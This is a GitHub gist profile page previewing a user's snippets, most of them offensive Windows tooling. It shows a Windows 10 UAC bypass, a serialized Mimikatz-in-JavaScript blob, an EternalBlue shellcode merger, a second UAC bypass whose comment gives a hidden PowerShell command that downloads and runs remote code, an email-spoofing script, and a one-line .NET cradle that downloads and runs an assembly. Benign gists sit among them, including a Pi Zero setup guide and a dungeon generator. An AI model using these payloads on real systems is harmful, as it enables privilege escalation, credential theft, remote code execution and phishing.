Skip to content

Instantly share code, notes, and snippets.

View Random1984's full-sized avatar

Random1984

43 followers · 121 following
  • Palookaville
View GitHub Profile
@Random1984
Random1984 / UACBypass.ps1
Created July 28, 2016 17:21 — forked from mattifestation/UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@Random1984
Random1984 / HowToOTGFast.md
Created August 16, 2016 12:21 — forked from gbaman/HowToOTGFast.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!

###Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)
More details - http://blog.gbaman.info/?p=791

For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. Finally, open up the cmdline.txt. Be careful with this file, it is very picky with its formatting! Each parameter is seperated by a single

@Random1984
Random1984 / katz.js
Created May 3, 2017 09:28
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
@Random1984
Random1984 / eternalblue_merge_shellcode.py
Created July 5, 2017 10:46 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@Random1984
Random1984 / FilelessII.ps1
Last active July 26, 2017 17:33
sdctl.exe UAC bypass
# UAC Fileless II Bypass - Spawns Admin cmd.exe using sdctl runas method - Runs fine in Win10 x64
# powershell.exe -W hidden -C iex (new-object net.webclient).downloadstring('https://gist.githubusercontent.com/Random1984/07638e5ae464d30aa011c0ffd3bbfa59/raw/b3dff9ea72c3594482fa93391c538e204d6a575d/FilelessII.ps1')"
$reg = "HKCU:\Software\Classes\exefile\shell\runas\command"
$nam = "IsolatedCommand"
# Check if $reg doesn't exist to create it
IF(!(Test-Path $reg)) {
New-Item -Path $reg -Force | Out-Null
@Random1984
Random1984 / rules.ini
Created September 23, 2017 10:30
stegbreak 'rules.ini' file
#
# This file is part of John the Ripper password cracker,
# Copyright (c) 1996-98 by Solar Designer
#
# Wordlist mode rules
[List.Rules:Wordlist]
# Try words as they are
:
# Lowercase every pure alphanumeric word
-c >3!?XlQ
@Random1984
Random1984 / email-spoofing.php
Created October 9, 2017 01:28 — forked from xpressyoo/email-spoofing.php
Email Spoofing Example (Educational Purposes only)
<?
/*
Email Spoofing script (PHP). For Educational Purposes only.
To note that capabilities of the script have been intentionally limited.
This work is licensed under a MIT License. Copyright 2012 Florian Bersier
*/
// Get posted data into local variables
$EmailFrom = Trim(stripslashes($_POST['EmailFrom'])); // Your email, e.g. [email protected]
@Random1984
Random1984 / README.md
Created January 3, 2018 20:18 — forked from Lazza/README.md
VPNGate Python script

vpngate.py

This script allows to use the free VPN service provided by VPNGate in an easy way. The user just needs to provide the desidered output country, and the script automatically chooses the best server.

After this step, OpenVPN is launched with the proper configuration. The VPN can be terminated by pressing Ctrl+C.

Usage

Run the script by providing the desired output country:

@Random1984
Random1984 / DotnetAssemblyDownloadCradle.cs
Created June 21, 2018 16:05 — forked from cobbr/DotnetAssemblyDownloadCradle.cs
A download cradle for .NET assemblies.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@Random1984
Random1984 / generate.c
Created March 5, 2019 12:01 — forked from munificent/generate.c
A random dungeon generator that fits on a business card
#include <time.h> // Robert Nystrom
#include <stdio.h> // @munificentbob
#include <stdlib.h> // for Ginny
#define r return // 2008-2019
#define l(a, b, c, d) for (i y=a;y\
<b; y++) for (int x = c; x < d; x++)
typedef int i;const i H=40;const i W
=80;i m[40][80];i g(i x){r rand()%x;
}void cave(i s){i w=g(10)+5;i h=g(6)
+3;i t=g(W-w-2)+1;i u=g(H-h-2)+1;l(u